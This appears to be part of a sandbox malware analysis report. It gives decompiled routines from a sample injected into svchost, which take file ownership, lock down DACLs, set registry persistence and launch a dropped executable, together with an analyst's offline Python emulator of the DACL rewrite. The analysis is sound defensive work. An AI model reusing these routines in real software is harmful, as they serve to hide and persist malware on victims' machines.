                                                                                				_v40 = 0x80;
                                                                                				_t95 = LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56); // executed
                                                                                				if(_t95 == 0) {
                                                                                					goto L42;
                                                                                				}
                                                                                				_v32 = GetLengthSid( &_v128);
                                                                                				_v44 = 0x400;
                                                                                				_t100 = GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44); // executed
                                                                                				if(_t100 == 0) {
                                                                                					goto L42;
                                                                                				}
                                                                                				if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
                                                                                					_v36 = 0x80;
                                                                                					_v40 = 0x80;
                                                                                					if(EqualSid( &_v128, _v16) == 0) {
                                                                                						_v28 = 1;
                                                                                						_t155 = LocalAlloc(0x40, 0x14);
                                                                                						if(_t155 != 0) {
                                                                                							if(InitializeSecurityDescriptor(_t155, 1) != 0 && SetSecurityDescriptorOwner(_t155,  &_v128, 0) != 0) {
                                                                                								SetFileSecurityA(_a4, 1, _t155); // executed
                                                                                							}
                                                                                							LocalFree(_t155);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_v24 = _t141;
                                                                                				if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
                                                                                					L41:
                                                                                					goto L42;
                                                                                				}
                                                                                				_t110 = _v20;
                                                                                				if(_t110 == _t141) {
                                                                                					goto L41;
                                                                                				}
                                                                                				_v8 = _v8 & _t141;
                                                                                				if(0 >= _t110->AceCount) {
                                                                                					goto L41;
                                                                                				} else {
                                                                                					goto L13;
                                                                                				}
                                                                                				do {
                                                                                					L13:
                                                                                					if(GetAce(_t110, _v8,  &_v12) == 0) {
                                                                                						L32:
                                                                                						_v8 = _v8 + 1;
                                                                                						goto L33;
                                                                                					}
                                                                                					_t153 = 0;
                                                                                					_v16 = _v12 + 8;
                                                                                					if(_t141 <= 0) {
                                                                                						L19:
                                                                                						if(_t141 < 0x20) {
                                                                                							 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
                                                                                							_t141 = _t141 + 1;
                                                                                						}
                                                                                						_t120 = EqualSid( &_v128, _v16);
                                                                                						_t146 = _v12;
                                                                                						if(_t120 == 0) {
                                                                                							_t121 = 0x1200a8;
                                                                                						} else {
                                                                                							asm("sbb eax, eax");
                                                                                							_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t146 + 4)) != _t121) {
                                                                                							 *((intOrPtr*)(_t146 + 4)) = _t121;
                                                                                							_t146 = _v12;
                                                                                							_v24 = 1;
                                                                                						}
                                                                                						if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
                                                                                							 *_t146 = 0;
                                                                                							_t66 = _v16 + 8; // 0xc8685f74
                                                                                							_t123 =  *_t66;
                                                                                							if(_t123 != 0) {
                                                                                								 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
                                                                                							} else {
                                                                                								 *((char*)(_v12 + 1)) = 0xb;
                                                                                							}
                                                                                							_v24 = 1;
                                                                                						}
                                                                                						goto L32;
                                                                                					}
                                                                                					while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
                                                                                						_t153 = _t153 + 1;
                                                                                						if(_t153 < _t141) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					if(_t153 >= _t141) {
                                                                                						goto L19;
                                                                                					}
                                                                                					DeleteAce(_v20, _v8);
                                                                                					_v24 = 1;
                                                                                					L33:
                                                                                					_t110 = _v20;
                                                                                				} while (_v8 < (_t110->AceCount & 0x0000ffff));
                                                                                				if(_v24 != 0) {
                                                                                					_v28 = 1;
                                                                                					_t154 = LocalAlloc(0x40, 0x14);
                                                                                					if(_t154 != 0) {
                                                                                						if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0) {
                                                                                							_t116 = SetFileSecurityA(_a4, 4, _t154); // executed
                                                                                							if(_t116 != 0) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                						}
                                                                                						LocalFree(_t154);
                                                                                					}
                                                                                				}
                                                                                				goto L41;
                                                                                			}
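What the routine above does, in security terms: it resolves the name returned by GetUserNameA to a SID through LookupAccountNameA, reads the file's owner and DACL with GetFileSecurityA, takes ownership of the file if that SID is not already the owner, and then walks the DACL once. Any later ACE whose SID was already seen is removed with DeleteAce (the routine tracks at most 32 SIDs on its stack), any ACE that is not ACCESS_ALLOWED or that carries INHERITED_ACE is turned into a non-inherited ACCESS_ALLOWED ACE with fixed inheritance flags, and every access mask is forced to 0x1f01ff (FILE_ALL_ACCESS) for the user's own SID (0x1601b9 when the second argument is non-zero) and to 0x1200a8 for every other SID. 0x1200a8 is execute plus attribute/EA reads without FILE_READ_DATA, so after SetFileSecurityA every other principal, SYSTEM included, can still run the file but can no longer read its bytes through a normal open; only a caller with SeBackupPrivilege or SeTakeOwnershipPrivilege gets around that. The example below is added here and is not part of the Joe Sandbox output or of the sample: a pure-Python parser for a self-relative SECURITY_DESCRIPTOR plus an emulation of the rewrite, so an analyst can check the before/after transformation offline against a descriptor dumped from disk. The SIDs and the sample descriptor are constructed for the example, the mask constants are the ones in the decompilation, and the signedness of the first-sub-authority comparison in the flag fix-up is an assumption.

```python
"""Added example: parse a self-relative SECURITY_DESCRIPTOR and emulate the
owner/DACL rewrite performed by the decompiled routine above (offline, pure Python)."""
import struct

# Access masks the routine writes into ACEs (values taken from the decompilation).
MASK_OTHERS = 0x001200A8     # FILE_READ_EA|FILE_EXECUTE|FILE_READ_ATTRIBUTES|READ_CONTROL|SYNCHRONIZE, no FILE_READ_DATA
MASK_USER_LTD = 0x001601B9   # user's own ACE when the routine's second argument (_a8) is non-zero
MASK_USER_FULL = 0x001F01FF  # FILE_ALL_ACCESS (= MASK_USER_LTD + 0x00090046) when _a8 == 0
ACCESS_ALLOWED_ACE_TYPE, INHERITED_ACE = 0x00, 0x10
SEEN_SID_SLOTS = 0x20        # the routine keeps at most 32 SID pointers on its stack


def sid_to_bytes(sid):
    """'S-1-5-32-544' -> revision(1), count(1), 48-bit authority (BE), sub-authorities (LE)."""
    parts = sid.split("-")
    subs = [int(x) for x in parts[3:]]
    return bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def sid_to_str(raw):
    count = raw[1]
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-1-%d" % int.from_bytes(raw[2:8], "big") + "".join("-%d" % s for s in subs)


def build_sd(owner, group, aces):
    """Self-relative SD with a DACL; aces = [(type, flags, mask, sid_str)]."""
    owner_b, group_b = sid_to_bytes(owner), sid_to_bytes(group)
    ace_b = b""
    for t, f, mask, sid in aces:
        s = sid_to_bytes(sid)
        ace_b += struct.pack("<BBHI", t, f, 8 + len(s), mask) + s          # ACE_HEADER, Mask, SID
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace_b), len(aces), 0) + ace_b  # ACL header, AceCount at +4
    off_owner, off_group = 20, 20 + len(owner_b)
    off_dacl = off_group + len(group_b)
    # Control = SE_SELF_RELATIVE | SE_DACL_PRESENT; no SACL.
    return struct.pack("<BBHIIII", 1, 0, 0x8004, off_owner, off_group, 0, off_dacl) + owner_b + group_b + acl


def parse_sd(buf):
    """Return (owner_sid_str, [(type, flags, mask, sid_str)]) from a self-relative SD."""
    _, _, _, off_owner, _, _, off_dacl = struct.unpack_from("<BBHIIII", buf, 0)
    owner, aces = sid_to_str(buf[off_owner:]), []
    if off_dacl:
        count = struct.unpack_from("<H", buf, off_dacl + 4)[0]        # the AceCount field the loop reads
        pos = off_dacl + 8
        for _ in range(count):
            t, f, size, mask = struct.unpack_from("<BBHI", buf, pos)
            aces.append((t, f, mask, sid_to_str(buf[pos + 8:])))    # SID sits at ACE+8, as in the decompilation
            pos += size
    return owner, aces


def emulate_rewrite(sd, user_sid, restrict_user=False):
    """Apply the routine's transformation; user_sid is what LookupAccountNameA returns for GetUserNameA."""
    owner, aces = parse_sd(sd)
    new_owner = user_sid                        # SetSecurityDescriptorOwner path when EqualSid fails
    changed = new_owner != owner
    seen, out = [], []
    user_mask = MASK_USER_LTD if restrict_user else MASK_USER_FULL
    for t, f, mask, sid in aces:
        if sid in seen:                         # SID already handled -> DeleteAce, index not advanced
            changed = True
            continue
        if len(seen) < SEEN_SID_SLOTS:
            seen.append(sid)
        want = user_mask if sid == user_sid else MASK_OTHERS
        if mask != want:
            mask, changed = want, True
        if t != ACCESS_ALLOWED_ACE_TYPE or f & INHERITED_ACE:
            first_sub = int(sid.split("-")[3]) if sid.count("-") > 2 else 0
            # Flag fix-up from the decompilation; the '> 0x50' test is treated as signed (assumption).
            # 0x0B includes INHERIT_ONLY_ACE, so on a file such an ACE no longer grants anything.
            f = 0x0B if first_sub == 0 else 2 + (1 if first_sub > 0x50 else 0)
            t, changed = ACCESS_ALLOWED_ACE_TYPE, True
        out.append((t, f, mask, sid))
    return new_owner, out, changed


# Constructed sample input: a file owned by Administrators with an inherited DACL and a
# second (deny) ACE for Everyone. The SIDs are made up for the example.
USER = "S-1-5-21-1000-2000-3000-1001"
SAMPLE_SD = build_sd("S-1-5-32-544", "S-1-5-21-1000-2000-3000-513", [
    (0x00, 0x10, 0x001F01FF, "S-1-5-32-544"),   # BUILTIN\Administrators, full control, inherited
    (0x00, 0x10, 0x001F01FF, "S-1-5-18"),       # SYSTEM
    (0x00, 0x10, 0x001200A9, "S-1-1-0"),        # Everyone, read and execute
    (0x01, 0x00, 0x00000002, "S-1-1-0"),        # ACCESS_DENIED for Everyone (duplicate SID)
    (0x00, 0x10, 0x001200A9, USER),             # the user running the sample
])

if __name__ == "__main__":
    owner, aces, changed = emulate_rewrite(SAMPLE_SD, USER)
    print("owner -> %s (changed=%s)" % (owner, changed))
    for t, f, mask, sid in aces:
        print("  type=%d flags=0x%02x mask=0x%08x %s" % (t, f, mask, sid))
```

Running the module prints the rewritten DACL: the duplicate Everyone ACE is gone, the user's ACE carries 0x1f01ff, and Administrators, SYSTEM and Everyone are each left with 0x1200a8 as non-inherited ACCESS_ALLOWED entries. On a live host the same pattern shows up in `icacls <file>` output as a user-owned file whose other entries list only execute and attribute rights; a descriptor that has already been through the routine comes back unchanged on a second pass, which is a cheap way to confirm a parsed DACL was produced by it.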

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0012782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00127866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00127878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0012789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00127F63,?), ref: 001278B8
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 001278D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 001278E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 001278F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00127901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00127910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00127933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00127963
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 0012798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 001279A3
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 001279C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00127A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00127A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00127A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00127A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: a7fe2938354135bce3524b65adfbb0f1c640760aaf60ccd114aa047031c4647b
                                                                                • Instruction ID: 03207f98bb994f51e8619de29ad9e77bdee47ea6fb729cc6b14e67c348ed2113
                                                                                • Opcode Fuzzy Hash: a7fe2938354135bce3524b65adfbb0f1c640760aaf60ccd114aa047031c4647b
                                                                                • Instruction Fuzzy Hash: 18813B71D04229ABDF22CFA5ED84FEFBBB8AF08354F14416AE505E2190D7359A91CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 791 128328-12833e call 127dd6 794 128340-128343 791->794 795 128348-128356 call 126ec3 791->795 796 12877b-12877d 794->796 799 12846b-128474 795->799 800 12835c-128378 call 1273ff 795->800 801 1285c2-1285ce 799->801 802 12847a-128480 799->802 812 128464-128466 800->812 813 12837e-128384 800->813 804 1285d0-1285da call 12675c 801->804 805 128615-128620 801->805 802->801 806 128486-1284ba call 122544 RegOpenKeyExA 802->806 815 1285df-1285eb 804->815 810 128626-12864c GetTempPathA call 128274 call 12eca5 805->810 811 1286a7-1286b0 call 126ba7 805->811 821 128543-128571 call 122544 RegOpenKeyExA 806->821 822 1284c0-1284db RegQueryValueExA 806->822 852 128671-1286a4 call 122544 call 12ef00 call 12ee2a 810->852 853 12864e-12866f call 12eca5 810->853 831 128762 811->831 832 1286b6-1286bd call 127e2f 811->832 814 128779-12877a 812->814 813->812 819 12838a-12838d 813->819 814->796 815->805 820 1285ed-1285ef 815->820 819->812 825 128393-128399 819->825 820->805 827 1285f1-1285fa 820->827 846 128573-12857b 821->846 847 1285a5-1285b7 call 12ee2a 821->847 829 128521-12852d RegCloseKey 822->829 830 1284dd-1284e1 822->830 826 12839c-1283a1 825->826 826->826 834 1283a3-1283af 826->834 827->805 836 1285fc-12860f call 1224c2 827->836 829->821 835 12852f-128541 call 12eed1 829->835 830->829 838 1284e3-1284e6 830->838 840 128768-12876b 831->840 864 1286c3-12873b call 12ee2a * 2 lstrcpyA lstrlenA call 127fcf CreateProcessA 832->864 865 12875b-12875c DeleteFileA 832->865 842 1283b3-1283ba 834->842 843 1283b1 834->843 835->821 835->847 836->805 836->840 838->829 848 1284e8-1284f6 call 12ebcc 838->848 850 128776-128778 840->850 851 12876d-128775 call 12ec2e 840->851 858 128450-12845f call 12ee2a 842->858 859 1283c0-1283fb call 122544 RegOpenKeyExA 842->859 843->842 861 12857e-128583 846->861 847->801 879 1285b9-1285c1 call 12ec2e 847->879 848->829 878 1284f8-128513 RegQueryValueExA 848->878 
850->814 851->850 852->811 853->852 858->801 859->858 883 1283fd-12841c RegQueryValueExA 859->883 861->861 871 128585-12859f RegSetValueExA RegCloseKey 861->871 899 12874f-12875a call 127ee6 call 127ead 864->899 900 12873d-12874d CloseHandle * 2 864->900 865->831 871->847 878->829 884 128515-12851e call 12ec2e 878->884 879->801 888 12841e-128421 883->888 889 12842d-128441 RegSetValueExA 883->889 884->829 888->889 894 128423-128426 888->894 895 128447-12844a RegCloseKey 889->895 894->889 898 128428-12842b 894->898 895->858 898->889 898->895 899->865 900->840
                                                                                C-Code - Quality: 97%
                                                                                			E00128328(char* __ecx, char __edx) {
                                                                                				char _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				struct _PROCESS_INFORMATION _v44;
                                                                                				char _v60;
                                                                                				struct _STARTUPINFOA _v128;
                                                                                				char _v388;
                                                                                				char _v427;
                                                                                				char _v428;
                                                                                				char _t88;
                                                                                				char _t89;
                                                                                				void* _t91;
                                                                                				char _t93;
                                                                                				int _t102;
                                                                                				char _t107;
                                                                                				intOrPtr _t113;
                                                                                				char _t116;
                                                                                				void* _t117;
                                                                                				signed int _t122;
                                                                                				char _t126;
                                                                                				void* _t128;
                                                                                				char* _t130;
                                                                                				char _t131;
                                                                                				char* _t133;
                                                                                				char _t134;
                                                                                				char* _t137;
                                                                                				int _t139;
                                                                                				char _t144;
                                                                                				char _t146;
                                                                                				char* _t147;
                                                                                				char _t149;
                                                                                				char _t153;
                                                                                				intOrPtr* _t154;
                                                                                				char* _t156;
                                                                                				char* _t159;
                                                                                				char _t160;
                                                                                				char _t165;
                                                                                				void* _t174;
                                                                                				signed int _t177;
                                                                                				char _t180;
                                                                                				char* _t188;
                                                                                				int _t189;
                                                                                				long _t193;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                				void* _t198;
                                                                                				void* _t199;
                                                                                
                                                                                				_t181 = __edx;
                                                                                				_t173 = __ecx;
                                                                                				_v16 = 0;
                                                                                				if(E00127DD6(__edx) != 0) {
                                                                                					return 1;
                                                                                				}
                                                                                				_t88 = E00126EC3();
                                                                                				__eflags = _t88;
                                                                                				if(_t88 != 0) {
                                                                                					_v8 = 0;
                                                                                					__eflags =  *0x132c3c; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					__eflags =  *0x132c38; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t130 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
                                                                                					_t198 = _t196 + 0x14;
                                                                                					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
                                                                                					__eflags = _t131;
                                                                                					if(_t131 != 0) {
                                                                                						L31:
                                                                                						_t133 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
                                                                                						_t198 = _t198 + 0x14;
                                                                                						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
                                                                                						__eflags = _t134;
                                                                                						if(_t134 != 0) {
                                                                                							L35:
                                                                                							E0012EE2A(_t173, 0x1322f8, 0, 0x100);
                                                                                							_t196 = _t198 + 0xc;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 != 0) {
                                                                                								E0012EC2E(_v8);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t188 =  *0x132c3c; // 0x0
                                                                                						_t137 = _t188;
                                                                                						_t44 =  &(_t137[1]); // 0x1
                                                                                						_t173 = _t44;
                                                                                						do {
                                                                                							_t181 =  *_t137;
                                                                                							_t137 =  &(_t137[1]);
                                                                                							__eflags = _t181;
                                                                                						} while (_t181 != 0);
                                                                                						_t139 = _t137 - _t173 + 1;
                                                                                						__eflags = _t139;
                                                                                						RegSetValueExA(_v12,  *0x132c38, 0, 1, _t188, _t139);
                                                                                						RegCloseKey(_v12);
                                                                                						goto L35;
                                                                                					}
                                                                                					_t144 = RegQueryValueExA(_v12,  *0x132c38, 0,  &_v28, 0,  &_v16);
                                                                                					__eflags = _t144;
                                                                                					if(_t144 == 0) {
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 == 1) {
                                                                                							__eflags = _v16;
                                                                                							if(_v16 > 0) {
                                                                                								_t147 = E0012EBCC(_v16);
                                                                                								_pop(_t173);
                                                                                								_v8 = _t147;
                                                                                								__eflags = _t147;
                                                                                								if(_t147 != 0) {
                                                                                									_t173 =  &_v16;
                                                                                									_t149 = RegQueryValueExA(_v12,  *0x132c38, 0,  &_v28, _t147,  &_v16);
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										E0012EC2E(_v8);
                                                                                										_pop(_t173);
                                                                                										_v8 = 0;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					RegCloseKey(_v12);
                                                                                					__eflags = _v8;
                                                                                					if(_v8 != 0) {
                                                                                						_t146 = E0012EED1(_v8,  *0x132c3c);
                                                                                						_pop(_t173);
                                                                                						__eflags = _t146;
                                                                                						if(_t146 == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                					goto L31;
                                                                                				} else {
                                                                                					_t153 = E001273FF(_t173, 0x130264, 0, 0,  &_v388,  &_v60); // executed
                                                                                					_t199 = _t196 + 0x14;
                                                                                					__eflags = _t153;
                                                                                					if(_t153 <= 0) {
                                                                                						L19:
                                                                                						_t91 = 0;
                                                                                						L56:
                                                                                						return _t91;
                                                                                					}
                                                                                					__eflags = _v388;
                                                                                					if(_v388 == 0) {
                                                                                						goto L19;
                                                                                					}
                                                                                					__eflags = _v60;
                                                                                					if(_v60 == 0) {
                                                                                						goto L19;
                                                                                					} else {
                                                                                						_t154 =  &_v388;
                                                                                						_t181 = _t154 + 1;
                                                                                						do {
                                                                                							_t180 =  *_t154;
                                                                                							_t154 = _t154 + 1;
                                                                                							__eflags = _t180;
                                                                                						} while (_t180 != 0);
                                                                                						_t156 = _t195 + _t154 - _t181 - 0x181;
                                                                                						__eflags =  *_t156 - 0x5c;
                                                                                						if( *_t156 == 0x5c) {
                                                                                							 *_t156 = 0;
                                                                                						}
                                                                                						__eflags =  *0x132159 - 0x60;
                                                                                						if( *0x132159 < 0x60) {
                                                                                							L18:
                                                                                							E0012EE2A(_t180, 0x1322f8, 0, 0x100);
                                                                                							_t196 = _t199 + 0xc;
                                                                                							L37:
                                                                                							_v20 = 0;
                                                                                							_v8 = 0;
                                                                                							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                							if(__eflags == 0) {
                                                                                								L42:
                                                                                								__eflags =  *0x132cd8; // 0x0
                                                                                								if(__eflags != 0) {
                                                                                									L46:
                                                                                									_t89 = E00126BA7(0x132cd8);
                                                                                									_pop(_t174);
                                                                                									__eflags = _t89;
                                                                                									if(_t89 == 0) {
                                                                                										L52:
                                                                                										 *0x132cd8 = 0;
                                                                                										L53:
                                                                                										__eflags = _v8;
                                                                                										if(_v8 != 0) {
                                                                                											E0012EC2E(_v8);
                                                                                										}
                                                                                										_t91 = 1;
                                                                                										__eflags = 1;
                                                                                										goto L56;
                                                                                									}
                                                                                									_t93 = E00127E2F(_t181);
                                                                                									__eflags = _t93;
                                                                                									if(_t93 != 0) {
                                                                                										L51:
                                                                                										DeleteFileA(0x132cd8);
                                                                                										goto L52;
                                                                                									}
                                                                                									_t193 = 0x44;
                                                                                									E0012EE2A(_t174,  &_v128, 0, _t193);
                                                                                									_v128.cb = _t193;
                                                                                									E0012EE2A(_t174,  &_v44, 0, 0x10);
                                                                                									_v428 = 0x22;
                                                                                									lstrcpyA( &_v427, 0x132cd8);
                                                                                									_t102 = lstrlenA( &_v428);
                                                                                									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
                                                                                									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
                                                                                									E00127FCF(_t174);
                                                                                									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
                                                                                									__eflags = _t107;
                                                                                									if(_t107 == 0) {
                                                                                										E00127EE6(_t174);
                                                                                										E00127EAD(_t181, __eflags, 0);
                                                                                										goto L51;
                                                                                									}
                                                                                									CloseHandle(_v44.hThread);
                                                                                									CloseHandle(_v44);
                                                                                									goto L53;
                                                                                								}
                                                                                								GetTempPathA(0x12c, 0x132cd8);
                                                                                								_t113 = E00128274(0x132cd8);
                                                                                								_pop(_t177);
                                                                                								_v24 = _t113;
                                                                                								_t116 = (E0012ECA5() & 0x00000003) + 5;
                                                                                								_v20 = _t116;
                                                                                								__eflags = _t116;
                                                                                								if(_t116 <= 0) {
                                                                                									L45:
                                                                                									_t117 = E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8);
                                                                                									_t69 = _v24 + 0x132cd8; // 0x0
                                                                                									E0012EF00(_t69, _t117);
                                                                                									E0012EE2A(_t177, 0x1322f8, 0, 0x100);
                                                                                									_t196 = _t196 + 0x28;
                                                                                									goto L46;
                                                                                								} else {
                                                                                									goto L44;
                                                                                								}
                                                                                								do {
                                                                                									L44:
                                                                                									_t122 = E0012ECA5();
                                                                                									_t177 = 0x1a;
                                                                                									_t181 = _t122 % _t177 + 0x61;
                                                                                									_v24 = _v24 + 1;
                                                                                									_v20 = _v20 - 1;
                                                                                									 *((char*)(_v24 + 0x132cd8)) = _t122 % _t177 + 0x61;
                                                                                									__eflags = _v20;
                                                                                								} while (_v20 > 0);
                                                                                								goto L45;
                                                                                							}
                                                                                							_t126 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0); // executed
                                                                                							_t196 = _t196 + 0xc;
                                                                                							_v8 = _t126;
                                                                                							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                							if(__eflags == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _t126;
                                                                                							if(_t126 == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _v20 -  *0x1321a4; // 0x30800
                                                                                							if(__eflags != 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							_t128 = E001224C2(_v8, _t127, 0);
                                                                                							_t196 = _t196 + 0xc;
                                                                                							__eflags =  *0x1322d4 - _t128; // 0x348c26af
                                                                                							if(__eflags == 0) {
                                                                                								goto L53;
                                                                                							}
                                                                                							goto L42;
                                                                                						}
                                                                                						_t189 = 4;
                                                                                						_v8 = 0;
                                                                                						_v16 = _t189;
                                                                                						_t159 = E00122544(0x1322f8, 0x130710, 0x35, 0xe4, 0xc8);
                                                                                						_t199 = _t199 + 0x14;
                                                                                						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12); // executed
                                                                                						__eflags = _t160;
                                                                                						if(_t160 != 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // executed
                                                                                						__eflags = _t165;
                                                                                						if(_t165 != 0) {
                                                                                							L16:
                                                                                							_v8 = 0;
                                                                                							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // executed
                                                                                							L17:
                                                                                							RegCloseKey(_v12);
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v28 - _t189;
                                                                                						if(_v28 != _t189) {
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _v16 - _t189;
                                                                                						if(_v16 != _t189) {
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _v8;
                                                                                						if(_v8 == 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00128587
                                                                                0x00128596
                                                                                0x0012859f
                                                                                0x00000000
                                                                                0x0012859f
                                                                                0x001284d3
                                                                                0x001284d9
                                                                                0x001284db
                                                                                0x001284dd
                                                                                0x001284e1
                                                                                0x001284e3
                                                                                0x001284e6
                                                                                0x001284eb
                                                                                0x001284f0
                                                                                0x001284f1
                                                                                0x001284f4
                                                                                0x001284f6
                                                                                0x001284f8
                                                                                0x0012850b
                                                                                0x00128511
                                                                                0x00128513
                                                                                0x00128518
                                                                                0x0012851d
                                                                                0x0012851e
                                                                                0x0012851e
                                                                                0x00128513
                                                                                0x001284f6
                                                                                0x001284e6
                                                                                0x001284e1
                                                                                0x00128524
                                                                                0x0012852a
                                                                                0x0012852d
                                                                                0x00128538
                                                                                0x0012853e
                                                                                0x0012853f
                                                                                0x00128541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128541
                                                                                0x00000000
                                                                                0x0012835c
                                                                                0x0012836e
                                                                                0x00128373
                                                                                0x00128376
                                                                                0x00128378
                                                                                0x00128464
                                                                                0x00128464
                                                                                0x00128779
                                                                                0x00000000
                                                                                0x0012877a
                                                                                0x0012837e
                                                                                0x00128384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012838a
                                                                                0x0012838d
                                                                                0x00000000
                                                                                0x00128393
                                                                                0x00128393
                                                                                0x00128399
                                                                                0x0012839c
                                                                                0x0012839c
                                                                                0x0012839e
                                                                                0x0012839f
                                                                                0x0012839f
                                                                                0x001283a5
                                                                                0x001283ac
                                                                                0x001283af
                                                                                0x001283b1
                                                                                0x001283b1
                                                                                0x001283b3
                                                                                0x001283ba
                                                                                0x00128450
                                                                                0x00128457
                                                                                0x0012845c
                                                                                0x001285c2
                                                                                0x001285c2
                                                                                0x001285c5
                                                                                0x001285c8
                                                                                0x001285ce
                                                                                0x00128615
                                                                                0x0012861a
                                                                                0x00128620
                                                                                0x001286a7
                                                                                0x001286a8
                                                                                0x001286ad
                                                                                0x001286ae
                                                                                0x001286b0
                                                                                0x00128762
                                                                                0x00128762
                                                                                0x00128768
                                                                                0x00128768
                                                                                0x0012876b
                                                                                0x00128770
                                                                                0x00128775
                                                                                0x00128778
                                                                                0x00128778
                                                                                0x00000000
                                                                                0x00128778
                                                                                0x001286b6
                                                                                0x001286bb
                                                                                0x001286bd
                                                                                0x0012875b
                                                                                0x0012875c
                                                                                0x00000000
                                                                                0x0012875c
                                                                                0x001286c5
                                                                                0x001286cc
                                                                                0x001286d8
                                                                                0x001286db
                                                                                0x001286eb
                                                                                0x001286f2
                                                                                0x001286ff
                                                                                0x00128705
                                                                                0x0012870d
